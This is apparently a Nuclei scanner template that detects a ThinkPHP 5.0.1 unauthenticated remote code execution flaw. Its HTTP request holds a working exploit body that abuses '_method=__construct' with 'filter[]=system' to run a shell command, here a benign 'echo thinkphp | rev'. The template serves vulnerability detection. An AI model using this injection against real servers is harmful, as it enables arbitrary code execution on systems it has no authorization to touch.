id: thinkphp-501-rce

info:
  name: ThinkPHP 5.0.1 - Remote Code Execution
  author: lark-lab
  severity: critical
  description: ThinkPHP 5.0.1 allows remote unauthenticated attackers to  execute arbitrary code via the 's' parameter.
  reference:
    - https://www.exploit-db.com/exploits/46150
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 10
    cwe-id: CWE-77
  metadata:
    max-request: 1
  tags: edb,thinkphp,rce

http:
  - method: POST
    path:
      - "{{BaseURL}}/?s=index/index/index"

    body: "s=echo%20thinkphp%20%7C%20rev&_method=__construct&method&filter[]=system"

    headers:
      Content-Type: application/x-www-form-urlencoded

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "phpkniht"

      - type: status
        status:
          - 200

# digest: 4b0a00483046022100e002ab433ca9be9195e4c58e389fca725d91320aa29fa266dcda7b7c602bec840221009de540c2dcea0a1862b7b7e078cf91229d4afd1926739b285fc2220c83eddc0d:922c64590222798bb761d5b6d8e72950
